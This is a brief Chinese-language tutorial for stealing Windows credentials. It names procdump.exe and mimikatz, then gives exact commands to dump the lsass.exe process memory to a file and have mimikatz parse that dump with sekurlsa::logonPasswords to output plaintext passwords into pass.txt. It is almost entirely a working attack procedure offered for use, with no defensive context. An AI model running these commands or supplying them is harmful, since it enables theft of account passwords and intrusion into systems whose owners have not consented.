所需工具:
procdump.exe
mimikatz
1、使用procdump将lsass.exe转储到文件
procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
2、 打开mimikatz输入以下语句即可获取明文密码
log pass.txt
sekurlsa::minidump xxxx_lsass.dmp
sekurlsa::logonPasswords full
注意事项:目标系统版本要和本地系统版本一样